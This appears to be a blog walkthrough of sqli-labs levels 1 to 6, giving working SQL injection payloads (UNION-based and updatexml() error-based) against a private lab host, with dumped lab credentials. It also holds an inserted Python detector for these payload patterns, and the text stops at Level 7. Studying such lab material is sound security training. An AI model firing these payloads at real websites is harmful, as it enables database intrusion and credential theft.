SQL Injection Series: SQLi Labs

Date: 2022-02-05 21:56:19

Preface

About comments

Note: in SQL, --[space] starts a comment, but a trailing space at the end of a URL is dropped when the request is sent, so --+ is used instead: the + is decoded to a space on the server side.

MySQL has three commonly used comment forms:

--[space]comment text
#comment text (written as %23 in a URL)
/*comment text*/

Level 1


Testing the injection type:

http://192.168.142.136/sqli/Less-1/?id=1'

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

http://192.168.142.136/sqli/Less-1/?id=1 and 1=1

Returns normally

http://192.168.142.136/sqli/Less-1/?id=1' and 1=1--+

Returns normally

http://192.168.142.136/sqli/Less-1/?id=1' and 1=2--+

Returns an error. Taken together, this is string-type (single-quote) injection.

http://192.168.142.136/sqli/Less-1/?id=1' order by 3--+

order by 3 succeeds, so the query has 3 columns

http://192.168.142.136/sqli/Less-1/?id=1' and 1=2 union select 1,2,3--+

Display positions 2 and 3 are revealed

http://192.168.142.136/sqli/Less-1/?id=1' and 1=2 union select 1,concat(user(),database(),version()),3--+


http://192.168.142.136/sqli/Less-1/?id=1'and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+


http://192.168.142.136/sqli/Less-1/?id=1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

All table names in the security database: emails,referers,uagents,users

192.168.142.136/sqli/Less-1/?id=1' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+

Column names obtained: id,username,password

192.168.142.136/sqli/Less-1/?id=1' and 1=2 union select 1,(select group_concat(username,password) from security.users),3 --+

Result:

DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,adm

Level 2

Numeric injection

1、http://192.168.142.136/sqli/Less-2/?id=2 order by 3
2、http://192.168.142.136/sqli/Less-2/?id=2 and 1=2 union select 1,2,3
···
Basically the same as the previous level; nothing more to add

Level 3

http://192.168.142.136/sqli/Less-3/?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
The error shows a closing parenthesis in the query, so the payloads are built as:

1、http://192.168.142.136/sqli/Less-3/?id=1') order by 3%23
2、http://192.168.142.136/sqli/Less-3/?id=22') union select 1,2,3%23
3、http://192.168.142.136/sqli/Less-3/?id=22') union select 1,concat(database(),version(),user()),3%23
···
The rest needs no further explanation; proceed exactly as in Level 1

Level 4

Adding a single quote gives no error; a double quote produces an error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"2"") LIMIT 0,1' at line 1

So the closing sequence is: ("")

http://192.168.142.136/sqli/Less-4/?id=2") order by 3%23

Much like Level 3; not repeated here

Level 5


This level is different: there is no display position, so union-based injection cannot be used to read data

The error message after adding a single quote is:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

So we use error-based injection


Using the updatexml() function

Retrieve: user(),database(),version()

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
Result: XPATH syntax error: '~root@localhost~'
database() and version() are retrieved the same way

Now retrieve the database names:

' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)%23
Result: XPATH syntax error: '~information_schema~'

Dump the table names (either step through them one at a time by changing the limit arguments, or use the group_concat function):

' and updatexml(1,concat(0x7e, (select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),1)%23
Result: XPATH syntax error: '~emails'

Dump the column names:

' and updatexml(1,concat(0x7e, (select concat(column_name) from information_schema.columns where table_name='users' limit 0,1)),1)%23
Result: XPATH syntax error: '~id'

Dump the data:

' and updatexml(1,concat(0x7e, (select concat_ws(':', username, password) from users limit 0,1)),1)%23
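As an added example (not part of the original post), a defender-side check for the payload shapes used across these levels: it decodes each request's query values the way the server does (so --+ becomes "-- " and %23 becomes "#", the detail from the preface) and flags comment terminators, UNION and ORDER BY probing, information_schema enumeration and updatexml()-style error-based extraction. The log lines and the indicator names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators taken from the payload shapes in this walkthrough: comment terminators
# (--[space], #, /*), UNION column probing, ORDER BY column counting,
# information_schema enumeration, updatexml()-style error extraction, and
# "and 1=2" style tautologies. Names are constructed for this example.
PATTERNS = {
    "comment_terminator": re.compile(r"(--\s|#|/\*)"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "tautology": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
}


def decoded_query_values(path):
    """Return the query values as the server sees them: parse_qsl turns '+' into a
    space and %23 into '#', which is exactly why the post writes --+ and %23."""
    query = urlsplit(path).query
    return [value for _, value in parse_qsl(query, keep_blank_values=True)]


def classify(path):
    """Sorted list of indicator names matched by any decoded query value of one request."""
    hits = set()
    for value in decoded_query_values(path):
        for name, pattern in PATTERNS.items():
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)


# Constructed sample request lines modelled on the post's URLs (not real traffic).
SAMPLE_LOG = [
    "GET /sqli/Less-1/?id=1 HTTP/1.1",
    "GET /sqli/Less-1/?id=1'%20and%201=2%20union%20select%201,2,3--+ HTTP/1.1",
    "GET /sqli/Less-3/?id=1')%20order%20by%203%23 HTTP/1.1",
    "GET /sqli/Less-5/?id=1'%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--+ HTTP/1.1",
]


def scan_log(lines):
    """Map each request path to its indicator list; clean requests map to []."""
    return {line.split(" ")[1]: classify(line.split(" ")[1]) for line in lines}


if __name__ == "__main__":
    for path, hits in scan_log(SAMPLE_LOG).items():
        print("ALERT" if hits else "ok   ", path, hits)
```

Real access logs percent-encode spaces the same way these sample lines do, so the request path can be fed in unchanged.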

Level 6

Same as Level 5, only the closing sequence changes: adding a single quote gives no error, adding a double quote produces an error

Level 7